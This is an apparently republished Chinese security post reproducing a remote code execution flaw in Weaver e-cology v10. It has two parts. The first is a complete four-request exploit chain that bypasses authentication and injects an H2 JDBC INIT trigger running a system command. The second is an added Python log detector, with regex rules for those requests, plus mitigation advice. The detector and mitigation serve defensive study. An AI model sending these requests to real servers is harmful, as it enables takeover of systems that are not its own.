(Follow the official account and send a private message with [20240821] to get the full PoC.)
PoC

Step 1:

POST /papi/passport/rest/appThirdLogin HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

username=sysadmin&service=1&ip=1&loginType=third

Step 2:

POST /papi/passport/login/generateEteamsId HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

stTicket=<serviceTicketId value returned by step 1>

Step 3: load the database driver class

POST /api/bs/iaauthclient/base/save HTTP/1.1
Host: x.x.x.x
Content-Length: 86
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: <data value returned by step 2>

{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

Step 4:

POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
Host: x.x.x.x
Content-Length: 199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: <returned data value>

{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"id\")$$"}
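The four requests above leave a distinctive trail in any proxy or WAF log that records request bodies: a third-party login followed by ticket exchange, an auth-client "ruleClass" that names a JDBC driver instead of an authentication rule, and a connection test whose JDBC URL points at an in-memory H2 database with an INIT script that defines a trigger. The detector below is an added example written for this page from the defender's side; it is not part of the original post and not Weaver code. It assumes a newline-delimited JSON log with `src`, `method`, `path` and `body` fields (the log format, source addresses, ticket value and the benign requests are constructed; the endpoint paths and payload shapes are the ones shown in the post).

```python
import json
import re
from collections import defaultdict

# Constructed records in the shape of a reverse-proxy or WAF log that keeps the
# request body (one JSON object per line). Source addresses, ticket value and
# the benign requests from 10.0.0.9 are made up; endpoint paths and payload
# shapes follow the request chain shown in the post.
RECORDS = [
    {"src": "10.0.0.7", "method": "POST", "path": "/papi/passport/rest/appThirdLogin",
     "body": "username=sysadmin&service=1&ip=1&loginType=third"},
    {"src": "10.0.0.7", "method": "POST", "path": "/papi/passport/login/generateEteamsId",
     "body": "stTicket=ST-CONSTRUCTED-0001"},
    {"src": "10.0.0.7", "method": "POST", "path": "/api/bs/iaauthclient/base/save",
     "body": json.dumps({"isUse": 1, "auth_type": "custom",
                         "iaAuthclientCustomDTO": {"ruleClass": "org.h2.Driver"}})},
    {"src": "10.0.0.7", "method": "POST", "path": "/api/dw/connSetting/testConnByBasePassword",
     "body": json.dumps({"dbType": "mysql5",
                         "dbUrl": "jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh "
                                  "BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\n"
                                  "java.lang.Runtime.getRuntime().exec(\"id\")$$"})},
    # Ordinary admin activity from another host: a real connection test and a list call.
    {"src": "10.0.0.9", "method": "POST", "path": "/api/dw/connSetting/testConnByBasePassword",
     "body": json.dumps({"dbType": "mysql5", "dbUrl": "jdbc:mysql://db.internal:3306/app"})},
    {"src": "10.0.0.9", "method": "GET", "path": "/api/hrm/user/list", "body": ""},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in RECORDS)

# Request order of the chain in the post; a source that hits all four in this
# order within the log window is reported separately from the per-request hits.
CHAIN = [
    "/papi/passport/rest/appThirdLogin",
    "/papi/passport/login/generateEteamsId",
    "/api/bs/iaauthclient/base/save",
    "/api/dw/connSetting/testConnByBasePassword",
]

H2_MEM_URL = re.compile(r"^\s*jdbc:h2:mem:", re.I)
# An H2 connection URL may carry an INIT script; one that defines a trigger with
# an inline $$...$$ body is the shape used in step 4 above.
H2_INIT_SCRIPT = re.compile(r";\s*init\s*=", re.I)
TRIGGER_SCRIPT = re.compile(r"create\s+trigger\b.*\bas\s+\$\$", re.I | re.S)


def parse_log(text):
    """Parse newline-delimited JSON records, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except ValueError:
            continue
    return records


def _json_body(body):
    """Decode a JSON request body; return None when it is not a JSON object."""
    try:
        value = json.loads(body)
    except (ValueError, TypeError):
        return None
    return value if isinstance(value, dict) else None


def inspect_record(rec):
    """Return (rule_id, severity, detail) findings for a single request record."""
    findings = []
    path = rec.get("path", "")
    body = rec.get("body") or ""
    if path == CHAIN[0] and "loginType=third" in body:
        findings.append(("ECO10-THIRD-LOGIN", "info",
                         "third-party login with loginType=third; confirm the caller is a registered integration"))
    if path == CHAIN[2]:
        dto = (_json_body(body) or {}).get("iaAuthclientCustomDTO") or {}
        rule_class = str(dto.get("ruleClass", ""))
        # A JDBC driver class is never a legitimate authentication rule class.
        if rule_class.startswith("org.h2.") or rule_class.endswith("Driver"):
            findings.append(("ECO10-H2-RULECLASS", "high",
                             f"auth client ruleClass set to {rule_class!r} (a JDBC driver class)"))
    if path == CHAIN[3]:
        cfg = _json_body(body) or {}
        db_url = str(cfg.get("dbUrl", ""))
        db_type = str(cfg.get("dbType", "")).lower()
        if H2_MEM_URL.match(db_url):
            note = "" if db_type.startswith("h2") else f"; dbType {db_type!r} does not match the URL"
            findings.append(("ECO10-H2-MEM-URL", "medium", "connection test against an in-memory H2 URL" + note))
        if H2_INIT_SCRIPT.search(db_url) and TRIGGER_SCRIPT.search(db_url):
            findings.append(("ECO10-H2-INIT-TRIGGER", "critical",
                             "JDBC URL carries an INIT script that creates a trigger with an inline script body"))
    return findings


def _is_subsequence(needle, haystack):
    """True if all items of needle appear in haystack in order (not necessarily adjacent)."""
    it = iter(haystack)
    return all(any(item == x for item in it) for x in needle)


def analyze(records):
    """Per-request findings plus the sources that performed the full four-step sequence."""
    findings, paths_by_src = [], defaultdict(list)
    for index, rec in enumerate(records):
        for rule, severity, detail in inspect_record(rec):
            findings.append({"index": index, "src": rec.get("src"), "rule": rule,
                             "severity": severity, "detail": detail})
        paths_by_src[rec.get("src")].append(rec.get("path"))
    chain_sources = [src for src, paths in paths_by_src.items() if _is_subsequence(CHAIN, paths)]
    return {"findings": findings, "chain_sources": chain_sources}


if __name__ == "__main__":
    result = analyze(parse_log(SAMPLE_LOG))
    for f in result["findings"]:
        print(f"[{f['severity']}] #{f['index']} {f['src']} {f['rule']}: {f['detail']}")
    print("full chain observed from:", result["chain_sources"])
```

The individual rules are deliberately narrow so they can be run against production logs without a flood of hits: the `loginType=third` rule is informational on its own and only becomes interesting when the same source goes on to change an auth client or test a connection, which is what the per-source chain check captures. Body logging on the reverse proxy is a prerequisite; without it only the path sequence is visible. On the mitigation side, the `ruleClass` and `dbUrl` values should be validated server-side against an allow-list of expected authentication rule classes and JDBC URL prefixes, and the affected endpoints should be restricted to administrators until the vendor fix is applied.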
Originally published by the WeChat official account 白帽攻防: [Vulnerability Reproduction] Weaver (泛微) e-cology v10 Remote Code Execution Vulnerability